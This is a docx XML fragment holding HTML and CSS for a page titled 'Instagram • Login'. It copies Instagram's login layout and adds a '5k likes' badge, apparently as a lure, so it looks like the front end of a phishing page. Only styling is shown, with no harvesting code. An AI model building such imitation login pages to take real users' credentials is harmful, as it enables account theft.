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9A78" w14:textId="77777777" w:rsidR="006504A5" w:rsidRDefault="006504A5"/>
    <w:p w14:paraId="487ADAAC" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C23C656" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;html lang="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CA083" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26C88A" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE80EDA" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EAE4B" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;title&gt;Instagram • Login&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC138B4" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A939D8" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        * {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CCEE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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439B5E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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503434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box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793963D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font-family: -apple-system, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>BlinkMacSystemFont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7456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76ED8F33" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B862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#fafafa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737530F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flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5896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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD4AAC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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7777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min-height: 100vh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F09C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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39466F8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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3096C1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091463BA" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .login-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E42827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#fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08946D1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border: 1px solid #dbdbdb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A056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border-radius: 1px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E893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max-width: 350px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283481E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width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21727CC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10px 0 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40294B30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box-shadow: 0 0 5px </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>rgba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(0,0,0,0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B363E11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3AF7CC8C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header */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EDD71" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .logo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3215E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7B80628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22px 0 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075042FD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2D26A014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.logo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7F3A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175px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA7BE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height: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760E00E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A805253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5k likes badge — same as "in your account" */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E320CE" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .badge-5k {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6E52D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flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066C809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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EA23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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2AF2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gap: 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36B02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#f0f0f0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310B68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border-radius: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337950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6px 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D705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6px auto 18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC371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fit-content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA33A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14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2BDC9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500;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA67A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#262626;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127EAA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border: 1px solid #dbdbdb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1361F93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#fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A25FB7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 xml:space="preserve">            box-shadow: 0 1px 2px </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>rgba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(0,0,0,0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EB3D0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0852593" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .badge-5k span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF71A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linear-gradient(145deg, #f58529, #dd2a7b, #8134af);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7500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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>webkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>-background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8535D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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>webkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>-text-fill-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E6BA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600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77244ED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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F07268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1161C88A" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .badge-5k .heart-icon {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5717E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#ed4956;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D7EA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18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0130458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line-height: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9025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0D0AE44D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form */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E51B26" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .login-form {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F79B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0 40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FCB80C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4A2D6D1D" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .input-group {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFD9A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margin-bottom: 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0EFAD9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4BBA1C5D" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .input-group input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF0B3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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BDA78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9px 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1A80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#fafafa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427421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border: 1px solid #dbdbdb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120809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border-radius: 3px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F21F2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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3315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outline: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA93D63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transition: border 0.1s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A4C3D3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02F94CB9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.input-group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>input:focus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31010B3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border-color: #a8a8a8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018AED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#fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8B890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9CD3E35" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .input-group input::placeholder {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D8658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#8e8e8e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC941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300;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89DCE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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB2F6D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2E874F53" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .login-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>btn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAFE1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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F38C0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#0095f6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244EEAA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border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D4F9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7px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233AA9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border-radius: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13249FC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white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11765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600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF6BC66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14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A66B0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margin-top: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42639F9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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE2D5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transition: background 0.2s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F0388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20473B79" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>login-btn:hover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C14AD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#1877f2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6200E5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33C95C69" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>login-btn:active</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAEE8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opacity: 0.8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC93D8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34509C29" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .divider {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383B0C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flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E22957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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDE7A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18px 0 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293BD1B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#8e8e8e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E87B1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13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6407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600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4413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4F65C978" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .divider::before, .divider::after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEE42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content: "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4552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flex: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34C6D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height: 1px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BBF23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background: #dbdbdb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36478A29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718C157E" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .divider::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621715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margin-right: 18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0700E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3B9C0DB" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .divider::after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68287AF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margin-left: 18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402DED3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2D2B3738" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .fb-login {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF22ED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7EFBE39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8px 0 14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205710DE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472ED59C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .fb-login a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5AE0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#385185;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1C25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14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7888C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font-weight: 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24DF1D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text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A902FA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inline-flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881FF6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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EE59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gap: 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829771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39C99208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.fb-login a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F401F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18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD32E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height: 18px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95D82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fill: #385185;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42911D2A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5418B06B" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .forgot-pw {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234E2B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51EB861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12px 0 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384E060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2BA0948C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .forgot-pw a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F984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#00376b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36309D7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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02161D1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text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25662DE2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5BFAF19F" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .signup-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>cta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45144C4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36BF591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border-top: 1px solid #dbdbdb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9DFF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20px 0 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA2A07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16px 40px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2A78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14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910FB7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#262626;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D05BC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C21EBE3" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .signup-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>cta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63679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#0095f6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C88E225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font-weight: 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A586F6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text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB65A3E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37B0F396" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .app-download {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D8D06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5D97D64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margin: 20px 0 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503427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14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AD58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#262626;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EA29D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46314391" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .app-badges {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF9E60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flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB221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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3056B99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gap: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19F64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margin-top: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108B16B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58B2A3D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.app-badges </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0543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height: 40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C2EC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width: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A7B5A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050B125A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footer */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBB47B" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .footer-links {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7857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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828C5B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flex-wrap: wrap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F366F0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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F109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gap: 8px 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723BC2EC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padding: 20px 10px </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>10px</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1CAA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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B91AE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#8e8e8e;</w:t>
      </w:r>
    </w:p>
